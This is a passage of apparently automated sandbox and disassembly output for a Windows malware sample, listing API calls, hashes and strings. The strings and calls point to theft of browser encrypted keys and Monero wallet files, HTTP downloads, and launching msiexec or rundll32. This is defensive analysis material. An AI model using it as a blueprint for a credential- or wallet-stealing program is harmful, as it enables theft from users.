                                                        • Opcode ID: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                                        • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                                                        • Opcode Fuzzy Hash: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                                        • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                                                        APIs
                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateGlobalStream
                                                        • String ID: image/jpeg
                                                        • API String ID: 2244384528-3785015651
                                                        • Opcode ID: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                                        • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                                                        • Opcode Fuzzy Hash: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                                        • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                                                        APIs
                                                        • strtok_s.MSVCRT ref: 00411307
                                                        • strtok_s.MSVCRT ref: 00411750
                                                          • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02EB5D28,?,0042110C,?,00000000), ref: 0041A82B
                                                          • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: strtok_s$lstrcpylstrlen
                                                        • String ID:
                                                        • API String ID: 348468850-0
                                                        • Opcode ID: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                                        • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                                                        • Opcode Fuzzy Hash: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                                        • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                                                        • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                                                        • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExecuteShell$lstrcpy
                                                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                                        • API String ID: 2507796910-3625054190
                                                        • Opcode ID: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                                        • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                                                        • Opcode Fuzzy Hash: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                                        • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                                                        APIs
                                                        • memset.MSVCRT ref: 0041429E
                                                        • memset.MSVCRT ref: 004142B5
                                                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                                                        • lstrcatA.KERNEL32(?,02EB9DB8), ref: 0041430B
                                                        • lstrcatA.KERNEL32(?,?), ref: 0041431F
                                                        • lstrcatA.KERNEL32(?,02EB9C68), ref: 00414333
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                                          • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                                          • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                                          • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                          • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                          • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                          • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                          • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                          • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                          • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                                                        • StrStrA.SHLWAPI(?,02EBA010), ref: 004143F3
                                                        • GlobalFree.KERNEL32(?), ref: 00414512
                                                          • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                          • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                          • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                          • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                          • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                                                        • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                                                        • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                                                        • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                        • String ID:
                                                        • API String ID: 1191620704-0
                                                        • Opcode ID: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                                        • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                                                        • Opcode Fuzzy Hash: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                                        • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                                                        APIs
                                                        • memset.MSVCRT ref: 02D04505
                                                        • memset.MSVCRT ref: 02D0451C
                                                          • Part of subcall function 02D09047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02D09072
                                                        • lstrcat.KERNEL32(?,00000000), ref: 02D04553
                                                        • lstrcat.KERNEL32(?,0064A30C), ref: 02D04572
                                                        • lstrcat.KERNEL32(?,?), ref: 02D04586
                                                        • lstrcat.KERNEL32(?,0064A5D8), ref: 02D0459A
                                                          • Part of subcall function 02D0A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D0A9EF
                                                          • Part of subcall function 02D08FF7: GetFileAttributesA.KERNEL32(00000000,?,02CF1DBB,?,?,0042565C,?,?,00420E1F), ref: 02D09006
                                                          • Part of subcall function 02CF9F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 02CF9FA0
                                                          • Part of subcall function 02CF9F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 02CF9FF9
                                                          • Part of subcall function 02CF9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02CF9C53
                                                          • Part of subcall function 02CF9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 02CF9C78
                                                          • Part of subcall function 02CF9C27: LocalAlloc.KERNEL32(00000040,?), ref: 02CF9C98
                                                          • Part of subcall function 02CF9C27: ReadFile.KERNEL32(000000FF,?,00000000,02CF16F6,00000000), ref: 02CF9CC1
                                                          • Part of subcall function 02CF9C27: LocalFree.KERNEL32(02CF16F6), ref: 02CF9CF7
                                                          • Part of subcall function 02CF9C27: CloseHandle.KERNEL32(000000FF), ref: 02CF9D01
                                                          • Part of subcall function 02D09627: GlobalAlloc.KERNEL32(00000000,02D04644,02D04644), ref: 02D0963A
                                                        • StrStrA.SHLWAPI(?,0064A0D8), ref: 02D0465A
                                                        • GlobalFree.KERNEL32(?), ref: 02D04779
                                                          • Part of subcall function 02CF9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02CF5155,00000000,00000000), ref: 02CF9D56
                                                          • Part of subcall function 02CF9D27: LocalAlloc.KERNEL32(00000040,?,?,?,02CF5155,00000000,?), ref: 02CF9D68
                                                          • Part of subcall function 02CF9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02CF5155,00000000,00000000), ref: 02CF9D91
                                                          • Part of subcall function 02CF9D27: LocalFree.KERNEL32(?,?,?,?,02CF5155,00000000,?), ref: 02CF9DA6
                                                          • Part of subcall function 02CFA077: memcmp.MSVCRT(?,00421264,00000003), ref: 02CFA094
                                                        • lstrcat.KERNEL32(?,00000000), ref: 02D0470A
                                                        • StrCmpCA.SHLWAPI(?,004208D1), ref: 02D04727
                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 02D04739
                                                        • lstrcat.KERNEL32(00000000,?), ref: 02D0474C
                                                        • lstrcat.KERNEL32(00000000,00420FB8), ref: 02D0475B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                        • String ID:
                                                        • API String ID: 1191620704-0
                                                        • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                                        • Instruction ID: 2baef9a1d96d6466b33fcbeaf7a4329564600951a595a7b72b323102e193ccb4
                                                        • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                                        • Instruction Fuzzy Hash: 6C7165B6900218BBDB14FBE0DC85FEE737AAF89300F408598E60596190EB75DB45CFA1
                                                        APIs
                                                        • memset.MSVCRT ref: 00401327
                                                          • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                          • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                          • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                          • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                          • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                                        • lstrlenA.KERNEL32(?), ref: 0040135C
                                                        • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02E84C48,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                          • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                          • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                          • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                          • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                          • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                        • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                                        • memset.MSVCRT ref: 00401516
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                        • API String ID: 1930502592-218353709
                                                        • Opcode ID: c1fb2d75e00c2d8f9dd5bf80775ae3441aa8fa7fb470dcc05c1c23cbe7dc55a4
                                                        • Instruction ID: 674d48b949cffd92695f0a4f51b6d393b2dd06dcaa63b8f6d50fb5eb71b8da29
                                                        • Opcode Fuzzy Hash: c1fb2d75e00c2d8f9dd5bf80775ae3441aa8fa7fb470dcc05c1c23cbe7dc55a4
                                                        • Instruction Fuzzy Hash: AA5164B195011897CB15FB61DD91BED733CAF54304F4041ADB60A62091EE385BDACBAA
                                                        APIs
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                          • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,02EBB178), ref: 00406303
                                                          • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                          • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,02EBB9B8,00000000,00000000,00400100,00000000), ref: 00406385
                                                          • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                          • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                                        • lstrlenA.KERNEL32(00000000), ref: 0041532F
                                                          • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                        • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                                        • lstrlenA.KERNEL32(00000000), ref: 00415383
                                                        • strtok.MSVCRT(00000000,?), ref: 0041539E
                                                        • lstrlenA.KERNEL32(00000000), ref: 004153AE
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                        • API String ID: 3532888709-1526165396
                                                        • Opcode ID: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                                        • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                                                        • Opcode Fuzzy Hash: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                                        • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                                                        APIs
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                          • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                          • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                        • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                                                        • StrCmpCA.SHLWAPI(?,02EBB178), ref: 00406147
                                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                                                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                                                        • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                                                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                                                        • InternetCloseHandle.WININET(a+A), ref: 00406253
                                                        • InternetCloseHandle.WININET(00000000), ref: 00406260
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                        • String ID: a+A$a+A
                                                        • API String ID: 4287319946-2847607090
                                                        • Opcode ID: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                                        • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                                                        • Opcode Fuzzy Hash: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                                        • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                                                        APIs
                                                          • Part of subcall function 02D0A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D0A9EF
                                                        • memset.MSVCRT ref: 02D00E83
                                                        • lstrcat.KERNEL32(?,00000000), ref: 02D00E9C
                                                        • lstrcat.KERNEL32(?,00420D7C), ref: 02D00EAE
                                                        • lstrcat.KERNEL32(?,00000000), ref: 02D00EC4
                                                        • lstrcat.KERNEL32(?,00420D80), ref: 02D00ED6
                                                        • lstrcat.KERNEL32(?,00000000), ref: 02D00EEF
                                                        • lstrcat.KERNEL32(?,00420D84), ref: 02D00F01
                                                        • lstrlen.KERNEL32(?), ref: 02D00F0E
                                                        • memset.MSVCRT ref: 02D00F34
                                                        • memset.MSVCRT ref: 02D00F48
                                                          • Part of subcall function 02D0AA87: lstrlen.KERNEL32(02CF516C,?,?,02CF516C,00420DDE), ref: 02D0AA92
                                                          • Part of subcall function 02D0AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 02D0AAEC
                                                          • Part of subcall function 02D08DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02CF1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02D08DED
                                                          • Part of subcall function 02D0AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D0ABD9
                                                          • Part of subcall function 02D0AB87: lstrcat.KERNEL32(00000000), ref: 02D0ABE9
                                                          • Part of subcall function 02D0AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D0AC2C
                                                          • Part of subcall function 02D0AC17: lstrcpy.KERNEL32(00000000), ref: 02D0AC6B
                                                          • Part of subcall function 02D0AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D0AC79
                                                          • Part of subcall function 02D0AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D0AB6C
                                                          • Part of subcall function 02D0AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D0AA4D
                                                          • Part of subcall function 02D09927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,02D00DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 02D09948
                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 02D00FC1
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02D00FCD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                        • String ID:
                                                        • API String ID: 1395395982-0
                                                        • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                                        • Instruction ID: d6ae67719fa9330daf58bd093da48c6fd01eee6976dec160bd4eae42bfb402ca
                                                        • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                                        • Instruction Fuzzy Hash: 538160B5940218ABCB14EBA0DD91FED733AEF54304F40419DA30A661E1EE746F88CF69
                                                        APIs
                                                          • Part of subcall function 02D0A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D0A9EF
                                                        • memset.MSVCRT ref: 02D00E83
                                                        • lstrcat.KERNEL32(?,00000000), ref: 02D00E9C
                                                        • lstrcat.KERNEL32(?,00420D7C), ref: 02D00EAE
                                                        • lstrcat.KERNEL32(?,00000000), ref: 02D00EC4
                                                        • lstrcat.KERNEL32(?,00420D80), ref: 02D00ED6
                                                        • lstrcat.KERNEL32(?,00000000), ref: 02D00EEF
                                                        • lstrcat.KERNEL32(?,00420D84), ref: 02D00F01
                                                        • lstrlen.KERNEL32(?), ref: 02D00F0E
                                                        • memset.MSVCRT ref: 02D00F34
                                                        • memset.MSVCRT ref: 02D00F48
                                                          • Part of subcall function 02D0AA87: lstrlen.KERNEL32(02CF516C,?,?,02CF516C,00420DDE), ref: 02D0AA92
                                                          • Part of subcall function 02D0AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 02D0AAEC
                                                          • Part of subcall function 02D08DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02CF1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02D08DED
                                                          • Part of subcall function 02D0AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D0ABD9
                                                          • Part of subcall function 02D0AB87: lstrcat.KERNEL32(00000000), ref: 02D0ABE9
                                                          • Part of subcall function 02D0AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D0AC2C
